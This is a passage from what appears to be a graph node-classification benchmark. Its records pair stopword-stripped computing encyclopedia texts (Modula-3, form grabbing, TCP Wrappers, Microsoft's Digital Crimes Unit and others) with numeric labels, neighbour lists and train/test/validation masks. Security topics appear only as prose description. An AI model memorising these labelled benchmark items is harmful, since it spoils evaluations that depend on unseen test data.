default implementation module implement interface name module may explicitly codice_1 module name example main program exports implementation module main interface compilation unit may codice_11 interfaces although circular imports forbidden may resolved import implementation module entities within imported module may imported instead module name using codice_12 syntax typically one imports interface uses 'dot notation access items within interface similar accessing fields within record typical usage define one data structure record object per interface along support procedures main type get name 't one uses codice_13 event name collision imported module entity within module reserved word codice_14 used codice_15 capability deemed unsafe compiler longer guarantee results consistent example interfacing c programming language keyword codice_16 prefixed front codice_6 codice_7 may used tell compiler enable certain low level features language example unsafe operation bypassing type system using codice_19 copy bits integer floating point codice_20 number interface imports unsafe module must unsafe safe interface may exported unsafe implementation module typical usage interfacing external libraries two interfaces built one unsafe safe generic interface corresponding generic module prefix codice_6 codice_7 keyword codice_23 take formal arguments interfaces thus like c++ templates one easily define use abstract data types unlike c++ granularity module level interface passed generic interface implementation modules actual arguments compiler generate concrete modules example one could define genericstack instantiate interfaces codice_24 codice_25 even interfaces objects long interfaces defines properties required generic modules note bare types codice_26 codice_20 ca n't used modules system generics based upon using modules arguments comparison c++ template bare type would used file integerelem.i3 file genericstack.ig file genericstack.mg file integerstack.i3 file integerstack.m3 identifier traced back originated unlike 'include feature languages compilation unit must import identifiers compilation units using codice_11 statement even enumerations make use 'dot notation used accessing field record modula-3 supports allocation data runtime two kinds memory allocated codice_29 codice_30 difference whether garbage collector see new used allocate data either classes memory codice_16 module codice_32 available free untraced memory object-oriented programming techniques may used modula-3 use required many features provided modula-3 modules generics usually take place object orientation object support intentionally kept simplest terms object type termed class object oriented languages introduced codice_33 declaration essentially syntax codice_34 declaration although object type reference type whereas records modula-3 similar structs c exported types usually named convention create separate public type expose methods data instance defines interface codice_35 two types codice_2 codice_5 defined object two methods codice_38 codice_39 codice_2 defined subtype codice_5 use codice_42 operator create new codice_43 object use built procedure codice_44 method codice_39 modula-3 codice_46 construct provides conceptually simple clean yet powerful mechanism hiding implementation details clients arbitrarily many levels friendliness use codice_46 show full implementation codice_35 interface note use codice_49 keyword brands objects make unique avoid structural equivalence codice_49 also take string argument omitted unique string generated modula-3 one programming languages requires external references module strictly qualified reference module codice_51 object codice_52 exported module codice_53 must take form codice_54 possible modula-3 import exported names module language requirements name qualification method overriding impossible break working program simply adding new declarations interface interface makes possible large programs edited concurrently many programmers without worries naming conflicts also makes possible edit core language libraries firm knowledge existing programs broken process exception handling based codice_55 ... codice_56 block system since become common one feature adopted languages notable exceptions delphi python scala visual basic.net codice_56 construct defined form switch statement possible exception case except clause modula-3 also supports codice_58 ... codice_59 ... codice_60 construct loops codice_59 occurs structure equivalent simple loop inside codice_55 ... codice_56 clause language supports use multi-threading synchronization threads standard module within runtime library m3core named thread supports use multi-threaded applications fact modula-3 runtime may make use separate thread internal tasks garbage collection built-in data structure codice_64 used synchronize multiple threads protect data structures simultaneous access possible corruption race conditions codice_65 corresponding codice_66 statements lock unlock codice_64 codice_64 object objects may derived example i/o section libm3 library readers writers rd.t wr.t derived mutex lock accessing modifying internal data buffers summary language features modula-3 one rare languages whose evolution features documented systems programming modula-3 four essential points language design intensively discussed topics structural vs. name equivalence subtyping rules generic modules parameter modes like codice_69 continuing trend started c programming language many features required write real programs left language definition instead provided via number standard libraries interfaces described detail standard libraries providing following features called standard interfaces required must provided language recommended interfaces implemented available implementations required c i/o also provided via libraries modula-3 called codice_72 codice_73 object-oriented design rd wr readers writers respectively libraries covered detail book greg nelson interesting aspect modula-3 one programming languages whose standard libraries formally verified contain various types bugs including locking bugs done auspices larch/modula-3 see larch family extended static checking projects dec systems research center several compilers available open source since aspect c data structures missing modula-3 union type existing modula-3 implementations able provide good binary compatibility c language type declarations arrays structs none books still print although used copies obtainable digitized partially digitized chapters one previous posterior versions obtainable research reports web although modula-3 gain mainstream status several parts dec-src m3 distribution arguably influential part network objects library formed basis java first rmi implementation including actual network protocol sun moved corba standard iiop based protocol dropped java documentation garbage collection remote objects still refer pioneering work done modula-3 network objects python implementation classes also inspired class mechanism found c++ modula-3",
    "neighbors": [
      512,
      2304,
      1145,
      9345,
      11010,
      9224,
      2830,
      6414,
      8082,
      11411,
      7067,
      3613,
      6558,
      5663,
      1952,
      1572,
      428,
      5677,
      7983,
      9008,
      2481,
      7479,
      8510,
      9535,
      323,
      963,
      8262,
      3144,
      8524,
      11219,
      11604,
      10075,
      7775,
      9441,
      4069,
      11625,
      8554,
      5612,
      9964,
      10862,
      10739,
      7158,
      7671,
      3705,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 4342,
    "label": 4,
    "text": "DRDO_NETRA:drdo netra netra network traffic analysis software network developed india centre artificial intelligence robotics cair defence research development organisation drdo laboratory used intelligence bureau india domestic intelligence agency research analysis wing raw country external intelligence agency intercept analyse internet traffic using pre-defined filters program tested smaller scales various national security agencies reported deployed nationwide soon january 2014 security agencies looking build system could monitor internet traffic real time basis due rapidly escalating threat posed terrorist criminal elements using data communication brought service providers like blackberry skype gmail focus law enforcement agencies two systems designed one drdo centre artificial intelligence robotics national technical research organisation ntro india technical intelligence agency inter-ministerial committee staffed members ministry home affairs intelligence bureau department telecom department national investigation agency formed evaluate systems select one internet monitoring system ntro system designed help paladion international private company netra designed team 40 scientists cair committee selected cair netra multiple issues ntro system serious security reservations involvement international private company sensitive project doubts ntro ability operate maintain upgrade system independently also raw tested ntro system happy ntro solution reported crashed frequently committee favoured netra indigenous solution involving government scientists personnel component solution outsourced outside agency agency testing netra ib also pleased performance committee observed cair continuously investing r keep fast-changing web technologies unlike ntro system first demonstrated premises sify technologies capture entire internet traffic passing probes netra analyse voice traffic passing software skype google talk intercept messages keywords 'attack 'bomb 'blast 'kill real-time enormous number tweets status updates emails instant messaging transcripts internet calls blogs forums even images generated internet obtain desired intelligence system raw analyses large amount international data crosses internet networks india three security agencies include ib raw allotted maximum 300 gigabytes gb per node totaling 1000 nodes storing intercepted internet traffic 1000 nodes x 300gb 300,000gb total space initially decided set extra 100 gb per node assigned remaining law enforcement agencies internet scanning coordination centre use system monitor internet similar ones used usa uk china iran many nations initially raw current user monitoring system 2013 ministry home affairs recommended use second netra system domestic law enforcement agencies done intelligence gathered external intelligence agency largely irrelevant use law enforcement agencies could handle data note department telecommunications dot stated system provide access multiple security agencies netra deployment discussed 2013 apex inter-ministerial group headed dot included representative cabinet secretariat ministry home affairs drdo cair intelligence bureau c-dot computer emergency response team cert-in drdo scientist dr. g. athithan cair team awarded 'agni award excellence self-reliance 2008 developing netra team comprised scientists indian institute science g.ravindra rahul m. kharge",
    "neighbors": [
      2208,
      6344
    ],
    "mask": "Train"
  },
  {
    "node_id": 4343,
    "label": 3,
    "text": "Zenji_(video_game):zenji video game zenji puzzle game designed matthew hubbard published activision 1984 released atari 5200 atari 8-bit family colecovision commodore 64 msx zx spectrum hubbard previously wrote dolphin atari 2600 zenji maze-based game wherein player controls disembodied mandarin-style head challenge connect series randomly rotated maze-segments attempt align glowing artifact known source acts maze focal point player moves segment maze attempts rotate portion source green light shine region signifying correct alignment portions maze connected successfully end timer player awarded points moves next stage successive mazes introduce greater complexity hazards player survival conclusion review commodore 64 edition zenji author compute gazette stated although final understanding source remains elusive zenji undeniably enjoyable game note last paragraph review also stated zenji appears multiplayer game ... 8 acolytes time ... documentation concerning however",
    "neighbors": [
      9006
    ],
    "mask": "None"
  },
  {
    "node_id": 4344,
    "label": 4,
    "text": "Form_grabbing:form grabbing form grabbing form malware works retrieving authorization log-in credentials web data form passed internet secure server allows malware avoid https encryption method effective keylogger software acquire user ’ credentials even input using virtual keyboard auto-fill copy paste sort information based variable names email account name password additionally form grabber log url title website data gathered method invented 2003 developer variant trojan horse called downloader.barbew attempts download backdoor.barbew internet bring local system execution however popularized well known type malware attack emergence infamous banking trojan zeus 2007 zeus used steal banking information man-in-the-browser keystroke logging form grabbing like zeus barbew trojan initially spammed large numbers individuals e-mails masquerading big-name banking companies form grabbing method first advanced iterations zeus allowed module detect grabbed form data also determine useful information taken later versions form grabber also privy website actual data submitted leaving sensitive information vulnerable trojan known tinba tiny banker trojan built form grabbing able steal online banking credentials first discovered 2012 another program called weyland-yutani bot first software designed attack macos platform work firefox web injects templates weyland-yutani bot different existing ones zeus spyeye another known version british airways breach september 2018 british airways ’ case organizations ’ servers appeared compromised directly attackers modifying one javascript files modernizr javascript library version 2.6.2 include pii/credit card logging script would grab payment information send information server controlled attacker hosted “ baways com ” domain ssl certificate issued “ comodo ” certificate authority british airways mobile application also loads webpage built css javascript components main website including malicious script installed magecart thus payments made using british airways mobile app also affected due recent increase keylogging form grabbing antivirus companies adding additional protection counter efforts key-loggers prevent collecting passwords efforts taken different forms varying antivirus companies safepay password manager others counter form grabbing users privileges become limited would prevent installing browser helper objects bhos form grabbing software administrators create list malicious servers firewalls",
    "neighbors": [
      3072,
      6786,
      5764,
      7044,
      10245,
      10756,
      9227,
      9356,
      9102,
      7441,
      8978,
      4863,
      4883,
      4245,
      278,
      9233,
      10392,
      1690,
      3867,
      9242,
      10141,
      5281,
      9761,
      2213,
      8998,
      9256,
      2857,
      939,
      300,
      3629,
      9771,
      1970,
      4023,
      10297,
      3643,
      6588,
      7739,
      9791,
      1088,
      3395,
      8387,
      4165,
      2508,
      5078,
      3032,
      4314,
      7515,
      9187,
      3941,
      11621,
      107,
      877,
      9591,
      3320,
      2041,
      5245,
      1279
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4345,
    "label": 2,
    "text": "MacTCP:mactcp mactcp standard tcp/ip implementation classic mac os version 7.5.1 first application-independent implementation tcp stack non-unix platform predates winsock 5 years released 1988 considered obsolete reliability issues incomplete features sometimes prevent operating properly modern internet addition api unique mac os least one developer released berkeley sockets-derived api make porting platforms easier originally substantial purchase carrying 2,500 price tag site license additional 2,500 fee commercial use price lowered mid-1990s sold 60 mactcp included free mac os system 7.5 rising popularity internet made necessity apple replaced 1995 open transport improved interface user configuration although mactcp remained use older systems due generally lower system requirements",
    "neighbors": [
      576,
      5601,
      5864,
      6377,
      942,
      1807,
      5492
    ],
    "mask": "Test"
  },
  {
    "node_id": 4346,
    "label": 4,
    "text": "McAfee_Institute:mcafee institute mcafee institute llc. best known professional certification body administers several board certifications intelligence investigative sectors topics available training include cryptocurrency investigations cyber intelligence investigations counterintelligence human trafficking workplace violence active shooter organized retail crime leadership incident response digital forensics fraud deception detection founded 2010 mcafee institute professional certification training organization focused intelligence investigative sectors 2018 mcafee institute grown offer several industry recognized board certifications governing board mcafee institute oversees certification affairs organization contributes global standards certifications helps institute policy actions membership meetings ballot governing board consists world best federal local state law enforcement intelligence loss prevention cyber security private investigation around globe mcafee institute partnered dept homeland securities national initiative cybersecurity careers studies niccs listed site provider professional certifications space mcafee institute also partner recognized ileeta international law enforcement educators trainers association mcafee institute certified operate missouri dept education proprietary school central focus proprietary school certification program consumer protection accomplished establishment standards school operation monitoring operations ensure students treated fair equitable manner receive education training consistent published objectives instructional programs school mcafee institute cpe sponsor national registry cpe sponsors program offered national association state boards accountancy nasba recognize cpe program sponsors provide continuing professional education cpe programs accordance nationally recognized standards mcafee institutes resident based in-person certification training programs approved veterans administration g.i bill benefits effective november 12 2018 mcafee institute exams approved reimbursement va eligible limit number exams may take number times may take exam va pay exams even fail mcafee institute programs approved post continuing education credits following post missouri peace officer standards training clee mcafee institute headquartered chesterfield missouri teaching faculty organized three different levels independent certified instructors adjunct instructors senior instructors led director training certification michael simmons institute provides following certifications retired credentials 2018",
    "neighbors": [],
    "mask": "None"
  },
  {
    "node_id": 4347,
    "label": 1,
    "text": "Garant:garant garant complex services based legal information resource developed « garant-service-universitet » scientific-production enterprise limited liability company first large-scale commercial legal information system russia since 1990 containing legislation russian federation also english language garant comprehensive fully cross-referenced legal information resource following elements garant system – legal information database updated daily providing quick precise searches complex analysis legal situation keeping abreast changes legislation online format prime – daily individualised information feed contains legal news hundreds thousands commentaries legal acts court practice enables creating overviews changes legislation legal consulting – access unique body knowledge experts legal consulting solutions tens thousands real practical situations option receiving individual written consultations all-russia satellite online-seminars – interactive participation seminars given authoritative specialists moscow broadcast towns cities throughout russia incorporating possibility getting answers questions asked system electronic express – service providing electronic digital signatures participation electronic trading state municipal procurement initiatives garant vesti garant news – colour publication succinctly informing users important changes legislation interesting court practice new developments field legal information provision effective applications work legal information professional journals – « aktualnaya bukhgalteria » « current bookkeeping » pertinent reliable information bookkeepers « zakonadatelstvo » « legislation » authoritative legal analysis lawyers consultations efficient use system – assistance specialists plus clearly arranged resource materials allowing quick easy retrieval analysis information professional-user certificates also obtainable www.garant.ru legal portal – source timely legal information legislation news just-released documents consultations internet conferences senior state officials dialogue popular trade forum service – assistance solving technical questions working garant legal information resource hot-line dedicated personal managers present garant system contains 30 million documents acts official bodies including laws presidential decrees codes rules regulations court practice materials constantly updated interactive encyclopedias library trade press articles books commentaries legislation official bookkeeping statistical accounting forms economic legal terms explanatory dictionaries six european languages economic reference information business enquiries bookkeeping calendar contact details official bodies etc. system presents legislation 85 regions russian federation also included directory medicines medicine manufacturers garant system primarily intended bookkeepers accountants lawyers managers banking employees specialists including foreign ones whose job duties include solving issues legal character new documents appear electronic garant legal enquiry system l.e.s database direct contracts federal regional governmental bodies every day garant l.e.s gets updated approximately ten thousand documents « garant-maximum russia » electronic texts correspond exactly official texts undergo careful legal processing respective commentaries references schemes hypertext links applied accurately consistently garant l.e.s provides different types information searches main type search « basic search » one line created specially working legal information internet connection available « legal information online » function allows one get access shell system services « legal information support hotline » « legal consulting » user sends question gets answer back expert directly system « time machine » function enables searching texts documents effect particular moment time past « document checking » function allows track histories changes documents « similar documents » function lets one instantly create list documents court practice questions answers theme similar given document « version comparison » function compares two versions document example version latest amendments previous version « news online » function allows loading online within system shell legal news information « online meeting » function provides users network version exchange instant messages like internet messengers incorporate hypertext links documents system system fully integrated internet free-of-charge internet version containing main regulatory documents russia fuller internet version accessible commercial basis « mobile garant online » gives access legal information system convenient flash memory stick internet connection available allows working legal information is/was current given moment time document applicability check function also possibility working internet version system higher patent chamber federal service intellectual property patents trademarks rospatent recognized garant well-known trademark russian federation since january 1 1998 quality management system developer complies iso 9001-2008 standard delivery installation garant legal information resource handled 250 partner organisations 500 towns cities russia",
    "neighbors": [
      1632,
      6797,
      7983,
      2901,
      11350,
      823
    ],
    "mask": "None"
  },
  {
    "node_id": 4348,
    "label": 4,
    "text": "Laptop_theft:laptop theft laptop theft significant threat users laptop netbook computers many methods protect data prevent theft developed including alarms laptop locks visual deterrents stickers labels victims laptop theft lose hardware software essential data backed thieves also may access sensitive data personal information systems authorize access based credentials stored laptop including mac addresses web cookies cryptographic keys stored passwords according fbi losses due laptop theft totaled 3.5 million 2005 computer security institute/fbi computer crime security survey found average theft laptop cost company 31,975 study surveying 329 private public organizations published intel 2010 7.1 employee laptops lost stolen end usefulness lifespan furthermore determined average total negative economic impact stolen laptop 49,256—primarily due compromised data efforts retroactively protect organizations people potential consequences compromised data total cost lost laptops organizations involved study estimated 2.1 billion 48b lost u.s. economy result data breaches 28 resulted stolen laptops portable devices 2011 bureau brief prepared nsw bureau crime statistics research reported thefts laptops increase last 10 years attributed part increase ownership also attractive proposition thieves opportunists 2001 2,907 laptops stolen new south wales dwellings 2010 risen 6,492 second cash items taken thieves bureau reports one four break-ins 2010 resulted laptop stolen startling trend burglaries lends increase identity theft fraud due personal financial information commonly found laptops statistics take account unreported losses figures could arguably much higher businesses much lose unencrypted poorly secured laptop misappropriated yet many adequately assess risk take appropriate action loss sensitive company information significant risk businesses measures taken adequately protect data survey conducted multiple countries suggested employees often careless deliberately circumvent security procedures leads loss laptop according survey employees likely lose laptop travelling hotels airports rental cars conference events behling wood examined issue laptop security theft survey employees southern new england highlighted security measures fundamentally basic training employees security measures limited inadequate concluded trends laptop thefts needed monitored assess intervention measures required passwords longer adequate protect laptops many solutions improve strength laptop protection full disk encryption fde increasingly popular cost-effective approach full disk encryption taken software-based approach hardware-based approach end-based approach fde provides protection operating system starts pre-boot authentication however precautions still need taken cold boot attacks number tools available commercial open source enable user circumvent passwords windows mac os x linux one example truecrypt allows users create virtual encrypted disk computer passwords provide basic security measure files stored laptop though combined disk encryption software reliably protect data unauthorized access remote laptop security rls available confidently secure data even laptop owner possession remote laptop security owner laptop deny access rights stolen laptop computer internet access number computer security measures emerged aim protecting data kensington security slot along locking cable provides physical security thefts opportunity cord attached something heavy moved locked case laptop 100 secure noble security lock slot different way attach security cable stop security plates stoplock kits offer additional physical security measures along secure online registry 24/7 toll-free recovery hotline service another possible approach limiting consequences laptop theft issue thin client devices field employees instead conventional laptops data reside server therefore may less liable loss compromise thin client lost stolen easily inexpensively replaced however thin client depends network access server available aboard airliners location without network access approach coupled strong authentication single sign-on sso 2006 laptop custody data analyst stolen contained personal health data 26.5 million active duty troops veterans agency estimated cost 100 million 500 million prevent cover possible losses data theft 2007 united states department veterans affairs agreed pay 20 million current former military personnel settle class action lawsuit 2007 financial services authority fsa fined uk ’ largest building society nationwide £980,000 inadequate procedures employees ’ laptop stolen domestic burglary laptop details 11 million customers ’ names account numbers whilst device password protected information unencrypted fsa noted systems controls fell short given took nationwide three weeks take steps investigate content missing laptop substantial fine invoked reinforce fsa ’ commitment reducing financial crime 2010 va reported theft laptop unidentified contractor computer contained personally identifiable information 644 veterans including data va medical centers records learning unencrypted laptop va investigated many va contractors might complying encryption requirement learned 578 vendors refused sign new contract clauses required encrypt veteran data computers apparent violation rules lojack laptops compiled list top ten places laptops stolen provide context ponemon institute released study indicates 600,000 laptops lost stolen us airports every year 65-69 remaining unclaimed",
    "neighbors": [
      3552,
      1251,
      612,
      3366,
      4262,
      11368,
      7024,
      2737,
      5681,
      4435,
      3572,
      7411,
      7794,
      2558,
      9791
    ],
    "mask": "None"
  },
  {
    "node_id": 4349,
    "label": 5,
    "text": "TCP_Wrappers:tcp wrappers tcp wrappers also known tcp_wrappers host-based networking acl system used filter network access internet protocol servers unix-like operating systems linux bsd allows host subnetwork ip addresses names and/or ident query replies used tokens filter access control purposes original code written wietse venema 1990 monitor cracker activities unix workstations department math computer science eindhoven university technology maintained 1995 june 1 2001 released bsd-style license tarball includes library named libwrap implements actual functionality initially services spawned connection super-server inetd got wrapped utilizing tcpd program however common network service daemons today linked libwrap directly used daemons operate without spawned super-server single process handles multiple connections otherwise first connection attempt would get checked acls compared host access control directives often found daemons configuration files tcp wrappers benefit runtime acl reconfiguration i.e. services n't reloaded restarted generic approach network administration makes easy use anti-worm scripts denyhosts fail2ban add expire client-blocking rules excessive connections and/or many failed login attempts encountered originally written protect tcp udp accepting services examples usage filter certain icmp packets exist 'pingd – userspace ping request responder january 1999 distribution package eindhoven university technology primary distribution site day replaced modified version replacement contained trojaned version software would allow intruder access server installed author spotted within hours upon relocated primary distribution personal site",
    "neighbors": [
      3717,
      6664,
      5397,
      11413,
      5402,
      5531,
      11293,
      8224,
      10016,
      4772,
      3750,
      10924,
      6189,
      8877,
      7983,
      2737,
      823,
      5433,
      2747,
      9151,
      2884,
      7364,
      5468,
      9320,
      5357,
      2804,
      5492,
      8692,
      2041
    ],
    "mask": "Test"
  },
  {
    "node_id": 4350,
    "label": 0,
    "text": "Statistical_parsing:statistical parsing statistical parsing group parsing methods within natural language processing methods common associate grammar rules probability grammar rules traditionally viewed computational linguistics defining valid sentences language within mindset idea associating rule probability provides relative frequency given grammar rule deduction probability complete parse sentence probability associated grammar rule may induced application grammar rule within parse tree computation probability parse tree based component rules form deduction using concept statistical parsers make use procedure search space candidate parses computation candidate probability derive probable parse sentence viterbi algorithm one popular method searching probable parse search context application search algorithms artificial intelligence example think sentence hold water reader would instantly see object called object performing action 'can i.e able thing object able hold thing object able hold water using linguistic terminology noun phrase composed determiner followed noun hold water verb phrase composed verb followed verb phrase interpretation sentence certainly perfectly valid noun-phrase referring type dance hold water also valid verb-phrase although coerced meaning combined sentence non-obvious lack meaning seen problem linguists discussion point see colorless green ideas sleep furiously pragmatic point view desirable obtain first interpretation rather second statistical parsers achieve ranking interpretations based probability number methods statistical parsing algorithms frequently use algorithms use give good overview general field statistical parsing algorithms based modified form chart parsing modifications necessary support extremely large number grammatical rules therefore search space essentially involve applying classical artificial intelligence algorithms traditionally exhaustive search examples optimisations searching likely subset search space stack search optimising search probability baum-welch algorithm discarding parses similar treated separately viterbi algorithm",
    "neighbors": [
      1890,
      7780,
      9288,
      2831,
      1490,
      11318,
      5399
    ],
    "mask": "None"
  },
  {
    "node_id": 4351,
    "label": 7,
    "text": "TreadMarks:treadmarks treadmarks distributed shared memory system created rice university 1990s",
    "neighbors": [
      2264
    ],
    "mask": "None"
  },
  {
    "node_id": 4352,
    "label": 1,
    "text": "Realm_(database):realm database realm open source object database management system initially mobile android/ios also available platforms xamarin react native others including desktop applications windows licensed apache license 2016 september realm mobile platform announced followed first stable release january 2017 allows two-way synchronization realm object server client side databases belong given logged-in user developer commercial edition released along business license integrating database management systems postgresql april 24th 2019 realm announced entered definitive agreement acquired mongodb realm development began end 2010 alexander stigsen along bjarne christiansen name tightdb company started 2011 combinator promoted nosql configurable durability ability share groups data across multiple processes also even multiple devices clusters tightdb renamed product realm september 2014 released public testing march 2015 funding 20 million disclosed realm mentioned trade press including firms ibm realm announced version 1.0 june 2016 released platform real-time two-way synchronization beta 2016 september release 2017 january provided nodejs sdk server-side applications may 2017 uwp support announced notable features realm following realm developed mostly open-source github source code language-specific bindings core database available aspects realm related sync feature however proprietary closed-source",
    "neighbors": [
      3462,
      10470,
      3881,
      8201,
      5677,
      8539,
      7292
    ],
    "mask": "None"
  },
  {
    "node_id": 4353,
    "label": 2,
    "text": "InstantGo:instantgo instantgo formerly connected standby microsoft specification windows 8 hardware software aims bring smartphone-type power management capabilities pc platform well increasing physical security specification describes microsoft proprietary standard windows 8 software hardware developers hardware vendors optionally comply meet user requirements devices able turned instantly mode also allows operating system continue performing background tasks updating content apps devices must able turn less 500 milliseconds hardware requirements extend battery life systems must drain 5 battery capacity idle 16-hour period requires following additional security-specific requirements example memory soldered motherboard prevent cold boot attack vectors involve removing memory machine well support secure boot windows 8.1 supporting instantgo trusted platform module tpm 2.0 chip allow device use passive device encryption system systems support specification incapable booting legacy bios operating systems pcs connected standby also manually enter sleep hibernate power states",
    "neighbors": [
      7106,
      2416,
      4505,
      7354,
      10079
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4354,
    "label": 9,
    "text": "Programming_domain:programming domain programming domain defines specific kind use programming language examples programming domains",
    "neighbors": [
      9345,
      7780,
      8262,
      9926,
      9780,
      987
    ],
    "mask": "Test"
  },
  {
    "node_id": 4355,
    "label": 2,
    "text": "Nitix:nitix nitix properly pronounced /nitiks/ retail linux distribution produced canada software developed net integration technologies inc. acquired ibm january 2008 currently operates ibm lotus foundations nitix originally named weaver first created september 1997 linux-based server required little configuration primarily built pre-configured hardware platforms named net integrators nitix first became standalone operating system capable deployment third-party hardware january 2004 programming earliest versions weaver done primarily avery pennarun dave coombs students university waterloo nitix claimed linux-based os autonomic features june 2004 ibm press released new book autonomic computing mentions nitix nitix one first companies deliver promise autonomic technology complete set intelligent networking solutions smb market june 2005 nitix virtual server released allowed hosting applications system architecture application services nitix allowed applications run virtual server environment completely separated controlled os environment virtual server rpm based filesystem incorporates yellow dog updater modified application retrieval tool simultaneously net integration technologies began sponsoring ready nitix program encouraged independent software vendors certify applications nitix also june 2005 nitix began support ns3 scalable services structure allows centralized user management across multiple servers well dns propagation march 2007 nitixblue released new flavor nitix nitixblue supports nearly hands-free installation ibm lotus domino touting administrative headaches complete automation maintenance tasks considered large step small medium businesses previously realistic stepping stone towards enterprise-level functionality provided ibm lotus domino january 2008 ibm announced acquire net integration technologies functions separate entity lotus software group nitix includes automated installation process installs onto hard disks performs proper partitioning system setup process also performs network scan determines whether enable dhcp server finds gateway internet access automatically configures firewall modifications installation process keyboard monitor attached server changes made console modifications made web interface web interface designed access needed configuration modifications cases interface set users teams file access email collaboration exchangeit antivirus antispam web sites ftp rsync services nfs samba appletalk nitix offers multi-layer security protection based anti-virus technology kaspersky anti-spam technology vircom engate nitix claim fame proprietary intelligent disk backup idb automatically backs files emails databases incrementally often every 15 minutes backups made hard drive located system rotated provide off-site redundancy restoring files done individually user entire system web-based interface u.s. patent 7,165,154 nitix includes many open source applications provide lot functionality january 18 2008 ibm announced intention purchase net integrations technologies ibm merged products offering known ibm lotus foundations lotus foundations offered software-only application server platform well hardware appliance known net integrator july 2 2008 ibm officially started offering lotus foundations opposed nitix blue ibm lotus foundations products withdrawn marketing march 14 2013 longer available purchase support ibm lotus foundations products withdrawn september 30 2014 nitix discontinued favour ibm lotus foundations start nitix currently sold distribution channel either software-only net integrator software-only versions nitix sb nitix se nitix pe come 1 cd geared towards partners complement third party hardware systems nitix differences number client access licenses included software assurance prices nitix also pre-configured hardware systems named micro micro 2 mark mark ii hardware selection depends number hard drives form factor nitix discontinued sale distribution channels favor latest lotus foundations start support active value added resellers purchase lotus foundations resell end users part complete solution usually involving services custom made applications",
    "neighbors": [
      8837,
      7435,
      10127,
      2321,
      5397,
      4887,
      10394,
      673,
      3745,
      10530,
      9253,
      10149,
      11305,
      7854,
      8622,
      2738,
      2996,
      4790,
      439,
      56,
      59,
      7483,
      3903,
      4673,
      7364,
      2375,
      2887,
      4039,
      8907,
      2005,
      1110,
      9693,
      2914,
      485,
      3685,
      9064,
      4841,
      5482,
      6890,
      7020,
      7913,
      7534,
      2671,
      7920,
      8177,
      9074,
      5363,
      10860,
      9461,
      6393,
      11388,
      8957
    ],
    "mask": "None"
  },
  {
    "node_id": 4356,
    "label": 4,
    "text": "Microsoft_Digital_Crimes_Unit:microsoft digital crimes unit microsoft digital crimes unit dcu microsoft sponsored team international legal internet security experts employing latest tools technologies stop interfere cyber crime cyber threats microsoft digital crimes unit assembled 2008 shortly 2013 cybercrime center dcu opened redmond washington 100 members dcu stationed redmond washington original cybercrime center members dcu include lawyers data scientists investigators forensic analysts engineers dcu international offices located major cities beijing berlin bogota delhi dublin hong kong sydney washington d.c dcu main focuses child protection copyright infringement malware crimes dcu must work closely law enforcement ensure perpetrators punished full extent law dcu taken many major botnets citadel rustock zeus around world malware cost users 113 billion dcu jobs shut accordance law three areas dcu concentrates trespass chattel legal term microsoft digital crimes unit takes cyber criminals chattel old english cattle considered valuable property owner essentially meaning property land referred chattel cattle spam malware infects user computer network considered trespass chattel trespassing user property cybercrime criminal trespassed user computer network responsible spam malware intended harm user dcu legal team pursue cyber criminal court using old legal doctrines laws charge crime trespassing botnet network compromised computer zombies controlled without user knowledge usually used repetitive tasks spam also used distributing malware distributed denial service ddos attacks botnets controlled single criminal network criminals microsoft digital crimes unit constantly hunting botnet networks used tasks dcu dealt botnets spamming key-logging data ransom dcu also taken botnets citadel rustock zeus everyday fight dcu continue locate new threats botnets take march 18th 2011 microsoft digital crimes unit took rustock botnet rustock botnet responsible half spam worldwide sent users controlled 1 million computers spam viruses attached emails phishing emails microsoft help u.s marshals got warrants seize identified local command-and-control servers analysis dcu u.s. marshals raided servers located chicago columbus dallas denver kansas city scranton seattle dcu seized servers terminated entire world large decrease spam since spam rustock botnet march 25th 2012 microsoft digital crimes unit took zeus botnet investigation also known operation b71 zeus botnet responsible stealing 100 million 13 million infected computers botnet installed user computer pirated versions windows hidden download online zeus botnet works waiting user computer open web browser attempt banking online shopping show similar looking webpage field enter login information login information sent zeus server criminal access user accounts dcu accompanied u.s marshals shut botnet raiding two command-and-control server facilities located scranton pennsylvania lombard illinois dcu made case prosecute 39 unnamed cyber criminals responsible botnet accessing servers retrieving stolen data botnet shut starter code since sold black market make variations botnet citadel many therefore zeus botnet code still active evolved june 6th 2013 microsoft digital crimes unit took citadel botnet 1000 servers citadel botnet infected estimated 5 million computers using key-logging program steal information citadel responsible stealing least 500 million online personal bank accounts 80 countries stole banks american express bank america paypal hsbc royal bank canada wells fargo citadel code emerged cybercrime kit known zeus sold starter code black market thousands creators citadel unknown dcu prepared large amount charges prosecute dcu since helped users update systems get rid malware may still computers inactive december 5 2013 microsoft digital crimes unit fbi europol industry partners attempted disrupt zeroaccess botnet although efforts took 18 hosts part zeroaccess command control network peer-to-peer nature botnet zeroaccess remains active",
    "neighbors": [
      259,
      11524,
      6150,
      6797,
      782,
      1935,
      8978,
      4883,
      10900,
      3605,
      11030,
      3224,
      11549,
      7838,
      7456,
      929,
      5666,
      3875,
      6265,
      7970,
      11559,
      1832,
      6441,
      6827,
      7215,
      3890,
      11060,
      8757,
      7359,
      8640,
      4289,
      194,
      3527,
      9033,
      2508,
      6476,
      10957,
      4816,
      4945,
      4051,
      4435,
      9812,
      11221,
      4439,
      11605,
      7515,
      11103,
      4704,
      10338,
      740,
      3941,
      2919,
      9448,
      617,
      8681,
      4462,
      9585,
      7796,
      2041,
      10875,
      1916
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4357,
    "label": 3,
    "text": "Knightmare_(1986_video_game):knightmare 1986 video game knightmare short 1986 msx vertical scrolling shooter computer game player knight popolon fight way several levels defeat hudnos rescue aphrodite knightmare innovative upward-scrolling shoot 'em game msx system released game cartridge top-view graphics considered sophisticated time similar msx games nemesis penguin adventure konami also released slightly altered version could bought links network japanese internet replacement 80 version could submit high scores online server",
    "neighbors": [
      8193,
      1763,
      10695,
      4524,
      9006,
      10576,
      6449,
      10931,
      1626,
      8027
    ],
    "mask": "None"
  },
  {
    "node_id": 4358,
    "label": 9,
